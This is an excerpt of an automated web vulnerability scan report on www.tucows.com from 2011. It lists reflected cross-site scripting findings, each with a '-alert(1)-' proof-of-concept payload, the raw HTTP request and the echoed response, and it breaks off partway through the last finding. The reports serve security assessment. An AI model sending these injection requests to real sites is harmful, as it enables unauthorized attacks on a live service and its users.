X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.242. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91153"-alert(1)-"4395b206045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.html?91153"-alert(1)-"4395b206045=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate/index.html?91153"-alert(1)-"4395b206045=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.243. http://www.tucows.com/author_ratings.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffad2"-alert(1)-"0aea99c7693 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author_ratings.htmlffad2"-alert(1)-"0aea99c7693 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/author_ratings.htmlffad2"-alert(1)-"0aea99c7693";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.244. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 509d3"-alert(1)-"fb9a5a72368 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.245. http://www.tucows.com/contact.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c33"-alert(1)-"30d1cfe8a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.html72c33"-alert(1)-"30d1cfe8a9a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/contact.html72c33"-alert(1)-"30d1cfe8a9a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.246. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10ba"-alert(1)-"8abc5e611cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.html?c10ba"-alert(1)-"8abc5e611cd=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/contact.html?c10ba"-alert(1)-"8abc5e611cd=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.247. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d2e"-alert(1)-"560230630e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images39d2e"-alert(1)-"560230630e8/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images39d2e"-alert(1)-"560230630e8/newassets/contact.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.248. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40764"-alert(1)-"3559dd93eff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets40764"-alert(1)-"3559dd93eff/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets40764"-alert(1)-"3559dd93eff/contact.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.249. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffcf"-alert(1)-"e9260562356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/contact.html3ffcf"-alert(1)-"e9260562356 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/contact.html3ffcf"-alert(1)-"e9260562356";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.250. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c0c"-alert(1)-"83c957dbfec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.251. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe9d"-alert(1)-"8324c4abd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.252. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87e88"-alert(1)-"29fef7fc009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
